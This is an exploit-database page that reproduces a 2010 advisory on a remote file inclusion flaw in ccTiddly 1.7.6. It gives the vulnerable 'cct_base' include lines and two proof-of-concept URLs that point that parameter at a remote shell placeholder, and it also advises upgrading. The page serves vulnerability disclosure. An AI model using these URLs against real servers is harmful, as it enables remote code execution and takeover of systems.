header-logo
Suggest Exploit
vendor:
ccTiddly
by:
eidelweiss
7,5
CVSS
HIGH
Multiple Remote File Inclusion
98
CWE
Product Name: ccTiddly
Affected Version From: 1.7.6
Affected Version To: 1.7.6
Patch Exists: YES
Related CWE: N/A
CPE: a:tiddlywiki:cctiddly
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010

ccTiddly v1.7.6 Multiple Remote File Inclusion Vulnerability

ccTiddly is a collaborative server side version of TiddlyWiki. This vulnerability exists due to insufficient sanitization of user-supplied input in the 'cct_base' parameter in the 'include.php' and 'workspace.php' scripts. A remote attacker can exploit this vulnerability to include arbitrary files from remote locations and execute arbitrary PHP code on the vulnerable system.

Mitigation:

The vendor has released a patch to address this vulnerability. Users are advised to upgrade to the latest version of ccTiddly.
Source

Exploit-DB raw data:

 1                    ########################################          1
 0                    I'm eidelweiss member from Inj3ct0r Team          1
 1                    ########################################          0
 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1


Developer: http://tiddlywiki.org/wiki/CcTiddlyDeveloper
Download: http://tiddlywiki.org/ccTiddly/ccTiddly_v1.7.6.zip
Author: eidelweiss
Contact: g1xsystem[at]windowslive.com
Original Advisories: http://eidelweiss-advisories.blogspot.com/2010/08/cctiddly-v176-multiple-remote-file.html

================================================================

ccTiddly is a collaborative server side version of TiddlyWiki.

Note:
This is the same vuln in other lower version (http://www.exploit-db.com/exploits/7336/)
Vendor Not Fix the vulnerability in all folder !!!

================================================================

	-=[Vuln C0de]=-

[!] path/includes/include.php

	include_once($cct_base."includes/ccAssignments.php");

[!] path/includes/workspace.php

	include_once($cct_base."includes/header.php");
	include_once($cct_base."includes/user.php");
	include_once($cct_base."includes/tiddler.php");

================================================================

	-=[P0C]=-

	http://127.0.0.1/path/includes/include.php?cct_base= [inj3ct0r sh3ll]

	http://127.0.0.1/path/includes/workspace.php?cct_base= [inj3ct0r sh3ll]


=========================| -=[ E0F ]=- |============================